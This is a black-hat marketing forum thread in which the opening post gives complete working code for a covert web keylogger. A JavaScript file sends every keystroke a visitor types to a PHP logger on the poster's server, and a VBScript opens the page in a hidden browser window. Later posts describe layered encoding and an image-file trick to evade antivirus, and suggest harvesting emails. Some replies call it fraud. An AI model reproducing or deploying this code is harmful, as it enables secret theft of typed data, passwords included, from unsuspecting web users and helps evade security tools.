1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

[GET] Javascript Keylogger

Discussion in 'Black Hat SEO' started by meannn, Dec 31, 2011.

  1. meannn

    meannn Supreme Member

    Joined:
    Apr 22, 2009
    Messages:
    1,461
    Likes Received:
    1,896
    Occupation:
    Unemployed Winner
    Location:
    TR
    So imagine you can log what users type on the page. Use your creativity and see the potential. Now let's begin;

    record.js

    function behavior(event)
    {
    var keya = "";
    keya = event.keyCode;
    keyb = String.fromCharCode(keya);
    makeRequest('http://site.com/record/write.php?on=' + keyb);
    }

    function makeRequest(url)
    {
    var httpRequest;

    if (window.XMLHttpRequest)
    { // Mozilla, Safari
    httpRequest = new XMLHttpRequest();
    if (httpRequest.overrideMimeType) {
    httpRequest.overrideMimeType('text/xml');
    }
    }
    else if (window.ActiveXObject)
    { // IE
    try
    {
    httpRequest = new ActiveXObject("Msxml2.XMLHTTP");
    }
    catch (e) {
    try {
    httpRequest = new ActiveXObject("Microsoft.XMLHTTP");
    }
    catch (e) {}
    }
    }

    if (!httpRequest)
    {

    return false;
    }
    httpRequest.onreadystatechange = function() { alertContents(httpRequest); };
    httpRequest.open('GET', url, true);
    httpRequest.send(null);
    }

    function alertContents(httpRequest)
    {
    if (httpRequest.readyState == 4) {
    if (httpRequest.status == 200) {
    }
    else
    {

    }
    }
    }


    write.php

    <?php
    $_GET['on'];
    $file = fopen($_SERVER['REMOTE_ADDR'] . ".txt","a");
    fwrite($file,$_GET['on'] . '||');
    fclose($file);
    ?>



    landpage.php

    <html>
    <head>
    <SCRIPT language="JavaScript" SRC="record.js"></SCRIPT>
    </head>

    <body onkeyup="behavior(event)">

    Page Content

    </body>

    </html>



    If visitors type something on the page, it recors it (creating txt file named visitor ip which contains what visitor write).


    Here is what you can do also,

    You can open the page at background (User can't see it)

    To do this,


    run.vbs

    Visible = 0

    Set objExplorer = WScript.CreateObject _
    ("InternetExplorer.Application", "IE_")
    objExplorer.Navigate "http://mysite.com/landpage.html"

    'Determines if the window is visible or not
    objExplorer.Visible = 0

    'Suspend the script for 1 minute
    WScript.Sleep 60000

    'Close the IE (instantiated) window
    objExplorer.quit

    Sub IE_onQuit()
    Wscript.Quit
    End Sub



    Now we have to make user run our vbs file. We can do this with,

    include this shit with

    <script type="text/vbscript" src="run.vbs"></script>
     
    • Thanks Thanks x 6
  2. lolkittens

    lolkittens Newbie

    Joined:
    Dec 28, 2011
    Messages:
    19
    Likes Received:
    4
    I've seen a CS keylogger before, you can get some usefull info with it.
    But be careful I have seen some AVs can pick this up if it isn't encrypted.
     
  3. PabloEscobar

    PabloEscobar Junior Member

    Joined:
    Jan 9, 2010
    Messages:
    152
    Likes Received:
    45
    Occupation:
    IT Manager
    Location:
    Liverpool, UK
    Hmmm got me thinking this... Is there a way to catch info from a users computer when they go on your page? Maybe even grab some cookies or passwords?
    I know there are some stealers out there that can do this but is there a web script that can something similar more basic?
     
  4. meannn

    meannn Supreme Member

    Joined:
    Apr 22, 2009
    Messages:
    1,461
    Likes Received:
    1,896
    Occupation:
    Unemployed Winner
    Location:
    TR
    Sorry, Cookie Stuffing is beyond the forum rules, so can't include.
     
  5. PabloEscobar

    PabloEscobar Junior Member

    Joined:
    Jan 9, 2010
    Messages:
    152
    Likes Received:
    45
    Occupation:
    IT Manager
    Location:
    Liverpool, UK
    Ok maybe not cookie stuffing... as I said a stealer... is that possible? And isnt cookie stuffing adding cookies to someones computer? I meant taking them from the computer with a script?
     
  6. yami

    yami Newbie

    Joined:
    Nov 27, 2007
    Messages:
    30
    Likes Received:
    21
    No it's not possible. Script can access cookies only for domain where it's placed.

    And yes cookie stuffing is adding cookies to someone computer but not that way as you think :)
     
  7. walandio

    walandio Senior Member

    Joined:
    Jun 27, 2008
    Messages:
    1,198
    Likes Received:
    684
    Location:
    Pilipinas
    this will be useful.. thanks..
     
  8. meannn

    meannn Supreme Member

    Joined:
    Apr 22, 2009
    Messages:
    1,461
    Likes Received:
    1,896
    Occupation:
    Unemployed Winner
    Location:
    TR
    Update: This doesn't work on newest version of Firefox.
     
  9. CoyoteAssassin

    CoyoteAssassin Elite Member

    Joined:
    Jan 3, 2010
    Messages:
    1,862
    Likes Received:
    3,906
    Occupation:
    Full Time IMer
    Location:
    USA
    Good! Blackhat marketing is one thing. Pure fraud is another.

    A few years ago I would have jumped on this. I'm not sure I want to be the person responsible for someone's pain. I don't see that life going very far.

    MalwareBytes does a great job at blocking access to these pages and scripts.
     
  10. meannn

    meannn Supreme Member

    Joined:
    Apr 22, 2009
    Messages:
    1,461
    Likes Received:
    1,896
    Occupation:
    Unemployed Winner
    Location:
    TR
    Nope. I encode my script 5-6 times (with different types of encoding) and run my javascript from image file with htaccess trick. Tell them to work on this.
     
  11. fun4uoc

    fun4uoc Jr. VIP Jr. VIP Premium Member

    Joined:
    Dec 25, 2007
    Messages:
    1,199
    Likes Received:
    1,041
    Location:
    ☆ ♔ ☆ ♔ ☆ ♔ ☆
    Could this be used on an iframed page?

    It would be great to capture leads to determine whether or not an an advertiser is scrubbing leads.
     
  12. meannn

    meannn Supreme Member

    Joined:
    Apr 22, 2009
    Messages:
    1,461
    Likes Received:
    1,896
    Occupation:
    Unemployed Winner
    Location:
    TR
    Yes, but in the newest version of mozilla, no. You can collect targeted emails with this method.
     
    • Thanks Thanks x 1
  13. fun4uoc

    fun4uoc Jr. VIP Jr. VIP Premium Member

    Joined:
    Dec 25, 2007
    Messages:
    1,199
    Likes Received:
    1,041
    Location:
    ☆ ♔ ☆ ♔ ☆ ♔ ☆
    Awesome.

    I'm not looking to collect any emails, just want to find out what networks are scrubbing.
     
  14. meannn

    meannn Supreme Member

    Joined:
    Apr 22, 2009
    Messages:
    1,461
    Likes Received:
    1,896
    Occupation:
    Unemployed Winner
    Location:
    TR
    In this situation, I am doing more sophisticated things to determine if advertiser is shaving or not, here is what I do,

    I put a 200x100 hidden layer (opacity:0) on the last input part, when users hover the input for at least 200 miliseconds (which means visitor tends to write), I document.write an iframe and write to database with php that it filled.

    Because this keylogger method doesnt work on all browsers and may not be accurate so much.

    Results, shaving is almost on all networks (because advertisers are doing that) and here is the list of networks that sorted by minumum to maximum shave.

    1- Peerfly (very rare shaving)
    2- MaxBounty (very rare shaving)
    3- Convert2media (very rare shaving)
    4- Cpabeyond (little shaving)
    5- Axonmedia (middle shaving)
    6- Limelightcpa (hardcore shaving)

    ~meannn
     
    • Thanks Thanks x 4
  15. bugsyy

    bugsyy Regular Member

    Joined:
    Sep 19, 2010
    Messages:
    318
    Likes Received:
    60
    Location:
    Pyramids
    I totally agree. There is a lot of different keyloggers/Maleware/form grabber similar to your script and all lead to one thing FRAUD.

    Your job ends by deliver the offer to user . my 2 cents :)
     
  16. caroljordan1987

    caroljordan1987 Junior Member

    Joined:
    Jul 12, 2011
    Messages:
    119
    Likes Received:
    22
    Occupation:
    Working Hard to make Ends Meet
    Location:
    Far Away
    This is such BS. Its obvious your trying to push Peerfly.
     
  17. Adaninc5

    Adaninc5 Newbie

    Joined:
    Jan 11, 2012
    Messages:
    3
    Likes Received:
    0
    Thanks!
     
  18. ramin1370

    ramin1370 Newbie

    Joined:
    Mar 6, 2014
    Messages:
    1
    Likes Received:
    0



    hi
    tank you for this post

    but i have a problem !
    when run this code : open one tab in the my browser and just run in this tab and when my go to another tab not working !

    true:
    when run in one tab , can key logger in all opened tab
    please help me
    i'm waiting to answer